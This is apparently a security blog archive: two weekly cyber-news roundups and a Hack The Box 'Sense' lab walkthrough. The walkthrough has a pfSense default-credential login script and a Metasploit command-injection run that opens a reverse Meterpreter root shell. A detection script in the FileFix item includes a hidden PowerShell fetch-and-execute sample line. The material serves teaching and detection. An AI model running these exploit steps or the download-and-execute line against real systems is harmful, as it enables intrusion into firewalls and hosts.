6/27/2025

CyberChannel: Week of 6/22/25

REvil Hackers Walk Free After Serving Carding Sentences

Several members of the REvil ransomware group have been released by Russia after serving time for charges related to carding and malware distribution. Four individuals were released after their sentences were considered served during their pre-trial detention. Meanwhile, four other members received prison sentences ranging from 4.5 to 6 years after refusing to plead guilty. REvil, also known as Sodin and Sodinokibi, was a prominent ransomware group that emerged in 2019, but its operations were significantly disrupted following the 2021 Kaseya supply chain attack, which led to international law enforcement actions and arrests in both the U.S. and Russia. However, cybersecurity communication channels between the U.S. and Russia ceased after Russia's invasion of Ukraine.

DHS Warns of Increased Iranian Cyberattack Threats 

The U.S. Department of Homeland Security (DHS) recently issued a National Terrorism Advisory System bulletin, highlighting escalating Iranian cyber attack risks. This warning underscores a "heightened threat environment" in the United States, with potential "low-level" cyber attacks targeting U.S. networks from Iran-backed hacking groups and pro-Iranian hacktivists. The DHS also cautions against the mobilization of violent extremists. This advisory follows previous Iranian government cyber attacks on U.S. infrastructure and a recent alert from U.S., Canadian, and Australian authorities regarding Iranian hackers acting as initial access brokers. Notably, the state-sponsored Iranian group Br0k3r (also known as Pioneer Kitten) sells initial access to breached networks. This crucial cybersecurity warning likely stems from recent U.S. actions against Iranian nuclear facilities, prompting threats of "everlasting consequences" from Iran.

Canadian Telecom Hacked: Salt Typhoon Exploits Cisco Flaw 

The Chinese state-sponsored hacking group 'Salt Typhoon' breached a Canadian telecommunication firm in February 2025. The intrusion leveraged an unpatched, critical Cisco IOS XE web UI vulnerability (CVE-2023-20198), for which Cisco has shipped fixes since October 2023, to create administrative accounts and obtain elevated privileges on network devices. With that access, 'Salt Typhoon' retrieved and modified configuration files and established a GRE tunnel for traffic collection. The Canadian Centre for Cyber Security and the FBI confirmed the incident jointly. As 'Salt Typhoon' continues its reconnaissance and targeting across critical sectors, organizations, and telecommunication providers in particular, are urged to patch exposed device management interfaces and to audit their edge devices for unexpected accounts, configuration changes and tunnels.

Russian APT28 Group Leverages Signal for Ukraine Cyberattacks 

Russian state-sponsored hacking group APT28 (UAC-0001) is using Signal chats to deliver malware to Ukrainian government entities. The attacks deploy two novel malware families, BeardShell and SlimAgent, through malicious documents sent in Signal messages. This is not a Signal vulnerability; the actor is simply exploiting the platform's popularity as a phishing channel. The chain uses the open-source Covenant command-and-control framework to load BeardShell, which downloads and executes PowerShell scripts and exfiltrates their output, alongside the SlimAgent screenshot grabber. The campaign is part of APT28's ongoing cyberespionage against Ukraine and Western nations, and organizations should treat attachments received over messaging apps with the same suspicion as e-mail attachments.

New FileFix Attack Leverages File Explorer for Covert PowerShell Commands

A new social engineering technique, "FileFix," weaponizes the Windows File Explorer address bar to run PowerShell commands. Published by researcher mr.d0x as a variant of the "ClickFix" technique, it works from a phishing page: the victim is told to click an "Open File Explorer" button, which opens a File Explorer upload window and silently copies a PowerShell command to the clipboard, and is then instructed to paste "the file path" into the window's address bar and press Enter. The copied string is the command followed by a PowerShell comment (#) and a dummy document path, so the address bar appears to hold only a path while File Explorer executes the command in front of the comment. Because it relies on a stock Windows utility rather than a vulnerability, the method is expected to be adopted quickly by threat actors for malware delivery, as ClickFix was by groups such as North Korea's 'Kimsuky'. Businesses should fold this variant into user awareness training and detection rules.
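As an added illustration (not code from mr.d0x's write-up or from any vendor), the following Python sketch turns the description above into detection logic and runs it over constructed process-creation events. It assumes Sysmon-style records reduced to parent image, image and command line, and it looks for the two things the technique leaves behind: a PowerShell host launched with an inline command from an interactive parent, and a command line in which a comment is followed by a Windows path (the address-bar disguise). Which parent processes to watch is an environment-specific tuning choice and is marked as an assumption in the code; the same parent-plus-inline-command signal also catches the Win+R Run dialog variant of ClickFix.

```python
"""Flag process-creation events that look like FileFix or ClickFix abuse.

Added illustration, not code from mr.d0x's write-up or from any vendor. It
assumes Sysmon-style process-creation records reduced to three fields
(parent image, image, command line); the sample events are constructed.
"""
import re

# Assumption: the FileFix "Open File Explorer" button opens a file-upload
# window owned by the browser, so the pasted command may be parented by the
# browser process rather than explorer.exe; explorer.exe also parents
# anything typed into the Win+R Run dialog that ClickFix abuses.
SUSPICIOUS_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe",
                      "firefox.exe", "brave.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe"}

# A PowerShell comment followed by a Windows path: the dummy-path trick that
# makes the address bar look like a document path while the real command
# sits in front of the '#'.
COMMENT_THEN_PATH = re.compile(r"#\s*[A-Za-z]:\\[^\s\"']+")
# Inline command switches (-c/-Command, -e/-EncodedCommand and abbreviations).
INLINE_FLAG = re.compile(r"(?i)(?:^|\s)-(?:c|command|e|ec|enc|encodedcommand)\b")


def basename(image: str) -> str:
    """Lower-case file name of an image path, accepting / or \\ separators."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the reasons an event is suspicious; an empty list means benign."""
    if basename(event["image"]) not in SHELL_CHILDREN:
        return []
    parent = basename(event["parent_image"])
    cmd = event["command_line"]
    reasons = []
    if COMMENT_THEN_PATH.search(cmd):
        reasons.append("comment followed by a file path (address-bar disguise)")
    if parent in SUSPICIOUS_PARENTS and INLINE_FLAG.search(cmd):
        reasons.append(f"inline command launched from {parent}")
    return reasons


def scan(events: list) -> list:
    """Return (index, reasons) for every event that classify() flags."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]


# Constructed sample: one FileFix hit, one Run-dialog ClickFix hit, three benign.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"Powershell.exe -c ping example.com # C:\company\internal-secure\filedrive\HRPolicy.docx"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe"},  # user opened a console from Start
    {"parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -c Get-Process"},  # from a batch file
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "iex (irm http://lure.invalid/a)"'},  # Win+R
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoExit -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_EVENTS):
        print(index, "; ".join(reasons))
```

The comment-then-path signal is the more specific of the two and fires on its own; the parent-plus-inline-command signal is noisier, so in production it is worth pairing with the command-line content (download cradles, hidden window switches) before paging anyone.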

Malicious npm Packages: North Korea's Latest Supply Chain Attack Uncovered 

A sophisticated supply chain attack, directly linked to North Korea and dubbed the "Contagious Interview" operation, is actively distributing 35 highly malicious npm packages. Cybersecurity researchers at Socket recently uncovered these packages, which have already garnered over 4,000 downloads, signifying a significant threat to the developer community. The attack's initial phase involves a hex-encoded loader, HexEval, gathering host intelligence. This loader then deploys BeaverTail, a JavaScript-based data stealer, followed by the InvisibleFerret Python backdoor, enabling comprehensive data exfiltration, keylogging, and remote control capabilities over compromised systems.

This state-sponsored cyber espionage campaign meticulously targets developers through elaborate social engineering tactics. Attackers leverage fake recruiter profiles on platforms like LinkedIn, enticing victims with fraudulent coding assignments embedded within projects on GitHub or Bitbucket. Developers are then persuaded to execute these projects in non-sandboxed environments during simulated interview processes, bypassing typical cybersecurity defenses. This multi-stage APT attack showcases an evolving and well-resourced adversary, blending advanced malware delivery, OSINT-driven targeting, and deceptive social engineering to infiltrate trusted development ecosystems for cryptocurrency theft and sensitive data exfiltration.

British National "IntelBroker" Faces US Charges for $25 Million Data Breaches 

British national Kai West, known as "IntelBroker," faces U.S. charges over a global data-theft campaign that prosecutors estimate caused $25 million in damages. The 25-year-old is accused of stealing and selling sensitive data, including health records and internal files, from government agencies, major corporations and critical infrastructure operators, frequently through the BreachForums hacking forum. IntelBroker's alleged activities are linked to high-profile breaches of entities such as Europol, General Electric, AMD and HPE. The indictment charges conspiracy to commit computer intrusions and wire fraud; the FBI says it confirmed his identity by tracing Bitcoin transactions. Arrested in France in February 2025, West is now the subject of a U.S. extradition request to face the charges in New York.

"Security Consultant" Pleads Guilty to Hacking Clients He Sought 

Nicholas Michael Kloster, a 32-year-old from Kansas City, has pleaded guilty to hacking multiple organizations, including a health club and a Missouri nonprofit, in a scheme to promote his cybersecurity services. Kloster's methods involved breaching networks, then contacting victims to detail his unauthorized access to systems like security cameras and router settings, subsequently offering his services. He also admitted to stealing sensitive data, installing VPNs on compromised networks, and acquiring hacking tools using stolen credit card information. This case highlights the significant legal repercussions for individuals engaging in unauthorized network access; Kloster now faces a potential five-year federal prison sentence, a substantial fine, and restitution for his cybercrime activities.

Ahold Delhaize Hacked: 2.2 Million Records Exposed in Ransomware Attack 

Food retail giant Ahold Delhaize recently confirmed a data breach impacting over 2.2 million individuals. This ransomware attack, occurring in November 2024, led to the compromise of personal, financial, and health data from its U.S. systems. The stolen information includes names, contact details, dates of birth, government IDs, and financial records. While Ahold Delhaize, operating major brands like Food Lion and Stop & Shop, hasn't officially named the perpetrators, the INC Ransom ransomware group claimed responsibility, leaking alleged stolen documents. This highlights the ongoing threat of cybersecurity attacks on major retailers and the importance of data security. 

10/07/2024

HTB: Sense

 ___  ___  _________  ________                         
|\  \|\  \|\___   ___\\   __  \  ___                   
\ \  \\\  \|___ \  \_\ \  \|\ /_|\__\                  
 \ \   __  \   \ \  \ \ \   __  \|__|                  
  \ \  \ \  \   \ \  \ \ \  \|\  \  ___                
   \ \__\ \__\   \ \__\ \ \_______\|\__\               
    \|__|\|__|    \|__|  \|_______|\|__|               
 ________  _______   ________   ________  _______      
|\   ____\|\  ___ \ |\   ___  \|\   ____\|\  ___ \     
\ \  \___|\ \   __/|\ \  \\ \  \ \  \___|\ \   __/|    
 \ \_____  \ \  \_|/_\ \  \\ \  \ \_____  \ \  \_|/__  
  \|____|\  \ \  \_|\ \ \  \\ \  \|____|\  \ \  \_|\ \ 
    ____\_\  \ \_______\ \__\\ \__\____\_\  \ \_______\
   |\_________\|_______|\|__| \|__|\_________\|_______|
   \|_________|                   \|_________|         
                                                            

Hack The Box's Sense is an Easy FreeBSD machine running pfSense, an open-source firewall distribution. Access is gained by brute-forcing directories with Gobuster to find a text file containing a user credential hint, then using a command injection in an authenticated pfSense page to obtain root on the machine.

After starting the machine on HTB and connecting to your HTB VPN, open a terminal and ping the machine's IP address to make sure the network is up. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.

ping 10.10.10.60

You should receive responses from the IP address. You can press CTRL + C to stop sending packets to the target host. Once confirming the network is up and running, it's time to move to enumeration using Nmap.

Start by doing a quick service scan using Nmap. We will use the -sV switch to enable version detection. You can learn more about Nmap here.

nmap -sV 10.10.10.60
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-02 11:17 CDT
Nmap scan report for 10.10.10.60
Host is up (0.0091s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
443/tcp open  ssl/https?

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.98 seconds

We can see a web server running on ports 80 and 443. Let's navigate to the site by entering the target's IP address in our web browser (HTTP redirects to HTTPS, which uses a self-signed certificate, so accept the browser warning). Upon inspection we see a login page for pfSense, an open-source firewall distribution based on FreeBSD. A quick Google search for the default pfSense credentials shows the default username is "admin" and the password is "pfsense". Trying these defaults fails. Let's move on to using Gobuster to brute-force directories on the server. We'll search for .php and .txt files using the directory-list-2.3-medium.txt wordlist; the -k switch tells Gobuster to skip TLS certificate verification.

gobuster dir -u https://10.10.10.60/ -t 50 -x php,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.60/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 6690]
/help.php             (Status: 200) [Size: 6689]
/themes               (Status: 301) [Size: 0] [--> https://10.10.10.60/themes/]
/stats.php            (Status: 200) [Size: 6690]
/css                  (Status: 301) [Size: 0] [--> https://10.10.10.60/css/]
/edit.php             (Status: 200) [Size: 6689]
/includes             (Status: 301) [Size: 0] [--> https://10.10.10.60/includes/]
/license.php          (Status: 200) [Size: 6692]
/system.php           (Status: 200) [Size: 6691]
/status.php           (Status: 200) [Size: 6691]
/javascript           (Status: 301) [Size: 0] [--> https://10.10.10.60/javascript/]
/changelog.txt        (Status: 200) [Size: 271]
/classes              (Status: 301) [Size: 0] [--> https://10.10.10.60/classes/]
/exec.php             (Status: 200) [Size: 6689]
/widgets              (Status: 301) [Size: 0] [--> https://10.10.10.60/widgets/]
/graph.php            (Status: 200) [Size: 6690]
/tree                 (Status: 301) [Size: 0] [--> https://10.10.10.60/tree/]
/wizard.php           (Status: 200) [Size: 6691]
/shortcuts            (Status: 301) [Size: 0] [--> https://10.10.10.60/shortcuts/]
/pkg.php              (Status: 200) [Size: 6688]
/installer            (Status: 301) [Size: 0] [--> https://10.10.10.60/installer/]
/wizards              (Status: 301) [Size: 0] [--> https://10.10.10.60/wizards/]
/xmlrpc.php           (Status: 200) [Size: 384]
/reboot.php           (Status: 200) [Size: 6691]
/interfaces.php       (Status: 200) [Size: 6695]
/csrf                 (Status: 301) [Size: 0] [--> https://10.10.10.60/csrf/]
/system-users.txt     (Status: 200) [Size: 106]
/filebrowser          (Status: 301) [Size: 0] [--> https://10.10.10.60/filebrowser/]

After some time, Gobuster reports /system-users.txt (status 200, 106 bytes). A plain text file in a firewall's web root is unusual and may contain user login information. We can view it by navigating to the path in our web browser; on my spawned HTB machine it would be https://10.10.10.60/system-users.txt. We get the following support ticket containing credentials:

####Support ticket###

Please create the following user


username: Rohit
password: company defaults

The ticket lists the username "Rohit" and, in place of a password, the phrase "company defaults". Trying the literal string "company defaults" on the pfSense login page is not accepted, but reading the phrase as a pointer to the vendor default password works: the username rohit with the default pfSense password "pfsense" grants access. This is a textbook case of a default credential surviving into production because a ticket, not a password manager, was the source of truth.
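The credential logic from the last two paragraphs, as an added Python example rather than anything from the original walkthrough: it parses the ticket, tries the literal value first and then treats "company defaults" as a reference to the vendor default password, and logs in to the pfSense web UI while honoring its csrf-magic token, which a plain credential sprayer would trip over. The ticket text is the one fetched above; the login form field names (usernamefld, passwordfld, login), the __csrf_magic hidden field, the "Username or Password incorrect" failure message and the lab address are assumptions based on the pfSense 2.1.x UI, and the network code only runs when the script is executed directly.

```python
"""Use the leaked support ticket to log in to the pfSense web UI.

Added example, not part of the original walkthrough or of pfSense. Assumptions:
the ticket text is the one served at /system-users.txt; "company defaults"
points at the vendor default password rather than being a password itself;
the login form fields (usernamefld, passwordfld, login), the csrf-magic hidden
field (__csrf_magic) and the failure message are those of the pfSense 2.1.x
UI; TARGET is the lab address and is only contacted from main().
"""
import re
import ssl
import sys
import urllib.parse
import urllib.request

TARGET = "https://10.10.10.60"
VENDOR_DEFAULTS = {"admin": "pfsense"}  # pfSense factory credentials

TICKET = """####Support ticket###

Please create the following user


username: Rohit
password: company defaults
"""

CSRF_PATTERNS = (
    re.compile(r'name=["\']__csrf_magic["\']\s+value=["\']([^"\']+)'),
    re.compile(r'csrfMagicToken\s*=\s*["\']([^"\']+)'),
)


def parse_ticket(text: str):
    """Return (usernames, passwords) listed in a 'field: value' style ticket."""
    users = re.findall(r"^\s*username:\s*(\S+)\s*$", text, re.M)
    passwords = re.findall(r"^\s*password:\s*(.+?)\s*$", text, re.M)
    return users, passwords


def candidate_logins(ticket_text: str, defaults=VENDOR_DEFAULTS):
    """Expand the ticket into (user, password) pairs in the order worth trying."""
    users, passwords = parse_ticket(ticket_text)
    cands = []
    for user in users:
        for pw in passwords:
            # Try the literal first; if it reads like "company defaults",
            # follow it with the vendor default password(s).
            guesses = [pw] + (list(defaults.values()) if "default" in pw.lower() else [])
            for p in guesses:
                for u in (user, user.lower()):
                    if (u, p) not in cands:
                        cands.append((u, p))
    for u, p in defaults.items():          # factory account as a last resort
        if (u, p) not in cands:
            cands.append((u, p))
    return cands


def extract_csrf(html: str):
    """Pull the csrf-magic token out of a pfSense page, or None if absent."""
    for pat in CSRF_PATTERNS:
        m = pat.search(html)
        if m:
            return m.group(1)
    return None


def login(base: str, username: str, password: str) -> bool:
    """POST the login form with a fresh CSRF token; True if the dashboard loads."""
    ctx = ssl._create_unverified_context()          # lab box, self-signed cert
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(),
        urllib.request.HTTPSHandler(context=ctx))
    page = opener.open(base + "/index.php", timeout=10).read().decode(errors="replace")
    form = {"usernamefld": username, "passwordfld": password, "login": "Login"}
    token = extract_csrf(page)
    if token:
        form["__csrf_magic"] = token
    body = opener.open(base + "/index.php",
                       data=urllib.parse.urlencode(form).encode(),
                       timeout=10).read().decode(errors="replace")
    # A failed attempt re-renders the form; a success shows the dashboard.
    return "Username or Password incorrect" not in body and 'name="usernamefld"' not in body


if __name__ == "__main__":
    base = sys.argv[1] if len(sys.argv) > 1 else TARGET
    for user, pw in candidate_logins(TICKET):
        ok = login(base, user, pw)
        print(f"{user}:{pw} -> {'success' if ok else 'failed'}")
        if ok:
            break
```

Run it as python3 pfsense_login.py https://10.10.10.60 against the lab box. The CSRF handling matters beyond this exercise: csrf-magic rejects any POST without a token tied to the session cookie, so a login check that does not fetch the form first reports every password as wrong.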

Let's fire-up Metasploit and search for potential exploits for pfSense:

msfconsole
Metasploit tip: To save all commands executed since start up to a file, use the 
makerc command
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v6.3.44-dev                          ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[msf](Jobs:0 Agents:0) >> search pfsense

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  exploit/unix/http/pfsense_clickjacking          2017-11-21       normal     No     Clickjacking Vulnerability In CSRF Error Page pfSense
   1  exploit/unix/http/pfsense_diag_routes_webshell  2022-02-23       excellent  Yes    pfSense Diag Routes Web Shell Upload
   2  exploit/unix/http/pfsense_config_data_exec      2023-03-18       excellent  Yes    pfSense Restore RRD Data Command Injection
   3  exploit/unix/http/pfsense_graph_injection_exec  2016-04-18       excellent  No     pfSense authenticated graph status RCE
   4  exploit/unix/http/pfsense_group_member_exec     2017-11-06       excellent  Yes    pfSense authenticated group member RCE
   5  exploit/unix/http/pfsense_pfblockerng_webshell  2022-09-05       great      Yes    pfSense plugin pfBlockerNG unauthenticated RCE as root


Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/http/pfsense_pfblockerng_webshell

[msf](Jobs:0 Agents:0) >> 

Module #3, exploit/unix/http/pfsense_graph_injection_exec, is an authenticated command injection: it needs valid web UI credentials, which we now have, and executes commands on the firewall through one of the graph status pages. You can read more about this specific exploit on Rapid7's website here. Let's select it and fill out the required options:

use 3
[*] Using configured payload php/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> options

Module options (exploit/unix/http/pfsense_graph_injection_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  pfsense          yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit
                                        /basics/using-metasploit.html
   RPORT     443              yes       The target port (TCP)
   SSL       true             no        Negotiate SSL/TLS for outgoing connections
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set RHOSTS 10.10.10.60
RHOSTS => 10.10.10.60
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set USERNAME rohit
USERNAME => rohit
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set LHOST tun0
LHOST => 10.10.14.6
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> 

We set RHOSTS to the target IP address, USERNAME to "rohit" (PASSWORD already defaults to "pfsense"), and LHOST to tun0, our VPN interface, so the reverse TCP connection comes back to us. We can now run the module with "exploit":

exploit

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (39927 bytes) to 10.10.10.60
[+] Deleted uz
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.60:53021) at 2024-10-02 12:06:53 -0500

(Meterpreter 1)(/var/db/rrd) > getuid
Server username: root
(Meterpreter 1)(/var/db/rrd) > 

Once the reverse TCP connection is established, "getuid" shows we are already root. There is no separate privilege escalation step because the pfSense web GUI runs with root privileges, so any command injection in one of its pages lands as root; this is why a leaked default password on a firewall's management interface is a full compromise rather than a foothold. You can now browse the target file system for the user and root .txt flags.

10/04/2024

CyberChannel: Week of 9/29/24

CUPS Vulnerability Could Amplify DDoS Attacks by 600 Times

A recently patched vulnerability in the Common Unix Printing System (CUPS) has emerged as a potential tool for cyber criminals. This flaw can be exploited to launch Distributed Denial-of-Service (DDoS) attacks with a significant amplification factor of 600 times. This means attackers can use a small amount of traffic to overwhelm a targeted server with a much larger volume, making it inaccessible to legitimate users.

Researchers discovered that chaining this CUPS flaw with three other vulnerabilities could potentially allow remote code execution on Unix-like systems. However, the primary concern lies in its DDoS amplification capabilities. Thankfully, patches are available to address this issue. System administrators are urged to update their CUPS installations to mitigate the risk and prevent their servers from being used in DDoS attacks.

"Pig Butchering" Apps Preying on App Store Users

"Pig butchering" scams have been discovered on both the Google Play Store and Apple's App Store. These fraudulent trading apps lure victims with promises of high returns on fake cryptocurrencies. Once users invest, their funds are stolen by the scammers. It's important to be cautious when downloading investment apps and to research the developer and user reviews before investing any money.

To avoid falling victim to these scams, users should be wary of unsolicited investment offers. It's also important to verify the legitimacy of the trading platform and the cryptocurrency before investing. Additionally, users should never share their personal or financial information with strangers.

Cloudflare Blocks 3.8 Tbps DDoS Attack, Setting New Record

Cloudflare, a web security company, recently thwarted a record-breaking distributed denial-of-service (DDoS) attack. The attack peaked at a staggering 3.8 terabits per second (Tbps) and lasted 65 seconds. The traffic came from a botnet of compromised devices, including Asus routers and MikroTik systems. It is the largest publicly recorded DDoS attack observed to date.

Compared with previous large-scale DDoS attacks, this one stands out for its sheer volume rather than its duration. DDoS attacks work by overwhelming a target server or network link with traffic, making it unavailable to legitimate users.

Evasive Linux Malware Enables Widespread Cryptomining

A stealthy malware campaign that has targeted Linux servers for years has finally come to light. The malware, dubbed "perfctl," has likely targeted millions of Linux servers and infected thousands of them. Researchers believe perfctl has been active for at least three years, exploiting a Polkit vulnerability (CVE-2021-4043) to escalate privileges and install cryptomining software.

Perfctl is particularly dangerous due to its evasive tactics. It avoids detection by stopping its activities when a new user logs in, only resuming once the user becomes idle again. Additionally, it deletes its own binary after execution, further enhancing its stealth. This highlights the importance of keeping systems updated and implementing strong security measures to protect against evolving cyber threats like perfctl.

FIN7 Targets Users with Deepfake Nude Generators to Spread Malware

There is a new tactic used by FIN7 hackers to spread malware. FIN7 is a cybercrime group known for sophisticated phishing and social engineering attacks. In this new campaign, FIN7 is creating fake AI-powered deepnude generator sites. These sites are designed to lure people interested in generating nude images using deepfakes. When users try to download the generated images, they are unknowingly downloading malware instead.

This is not the first time FIN7 has used social engineering to spread malware. FIN7 has been distributing NetSupport RAT and other malware through similar tactics. NetSupport RAT is a remote access trojan that allows attackers to take control of infected devices.

UMC Health System Impacted by Ransomware, Patients Diverted

The UMC Health System in Texas was recently impacted by a ransomware attack. This disrupted their IT infrastructure, forcing them to take critical measures to contain the incident. While their facilities remained open, some emergency and non-emergency patients had to be diverted to other locations.

UMC took immediate action to disconnect their systems and launched an investigation. As of now, no major ransomware group has claimed responsibility for the attack. This incident highlights the potential consequences of cyberattacks on critical infrastructure like healthcare systems. The disruption caused by the attack emphasizes the importance of robust cybersecurity measures in protecting patient care and hospital operations.

LockBit Ransomware Gang Hit with Global Crackdown

In a global effort to crack down on the LockBit ransomware gang, law enforcement from twelve countries have joined forces. This resulted in the arrest of four individuals connected to the cyber criminal group. These arrests included a developer, a bulletproof hosting service administrator, and two others associated with LockBit activity.

The operation not only involved arrests but also the seizure of LockBit infrastructure and the release of a decryption tool. This tool allows victims to recover their encrypted files for free. Additionally, authorities issued indictments targeting other LockBit affiliates and offered a substantial reward for information leading to the capture of the gang's leadership. These actions demonstrate international cooperation in combating ransomware threats and potentially offer relief to victims of LockBit attacks.

Hacker Steals Confidential Data for Profit

A British citizen, Robert B. Westbrook, has been charged by the U.S. Securities and Exchange Commission (SEC) for hacking into the computer systems of five public American companies. His goal was to access confidential earnings information before it was made public.

Westbrook allegedly used this stolen information to make profitable stock trades ahead of earnings announcements. Over a period of 18 months, between January 2019 and August 2020, he made an estimated $3.75 million in illegal profits through insider trading. The SEC alleges that Westbrook reset the passwords of senior executives to gain access to documents and emails containing financial reports. He then used anonymous email accounts, VPN services, and Bitcoin to conceal his identity while making the illicit investments. However, the SEC was eventually able to track him down using data analytics.